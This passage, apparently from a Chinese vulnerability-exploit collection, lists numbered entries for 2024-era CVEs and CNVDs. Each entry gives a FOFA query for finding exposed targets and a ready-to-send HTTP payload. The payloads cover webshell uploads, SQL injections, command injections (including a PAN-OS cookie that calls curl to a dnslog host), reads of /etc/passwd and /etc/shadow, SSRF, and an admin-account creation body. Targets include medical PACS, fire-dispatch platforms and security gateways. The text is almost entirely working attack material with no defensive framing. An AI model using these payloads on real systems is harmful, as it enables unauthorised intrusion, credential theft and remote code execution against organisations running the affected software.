{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 云商城 file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. 网康 (Netentsec) NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. 网康 (Netentsec) NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. 福建科立讯通信 command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. 福建科立讯通信 command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. 福建科立讯通信 command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. 福建科立讯通信 command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. 福建科立讯通信 command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass and template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request the /config file to obtain the component id
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd to a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access the file
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. 天维尔 fire-rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. 六零导航页 (LyLme Spage) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Visit the file path returned in the response: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216

curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. Meite CRM (美特CRM) upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"

POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

The uploaded file is reachable at http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"

POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. INFINITT (英飞达) PACS (medical image archiving and communication system) WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")

POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>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</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

The uploaded file is then reachable at /1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"

GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. Keytop (科拓) fully intelligent parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"

Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field carries the file content, which must be base64-encoded.

POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

The uploaded file is then reachable at http://x.x.x.x/dizxdell.aspx

162. Hefeng (和丰) multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"

POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

The uploaded file is then reachable at http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. Haoka Jituan (号卡极团) distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"

POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. Huixiaoyuan / Anxiaoyi (慧校园/安校易) smart campus management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"

POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

The uploaded file is then reachable at http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"

URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. Zhongcheng Kexin (中成科信) ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"

POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. Lean Value Management System (精益价值管理系统) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"

GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. Hongjing (宏景) EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"

GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. Hongjing (宏景) EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"

GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. Hongjing (宏景) EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"

POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. Tongtianxing (通天星) CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"

GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT high-definition license-plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"

GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"

POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. Jinhe (金和) OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"

GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. Jinhe (金和) OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"

GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"

POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

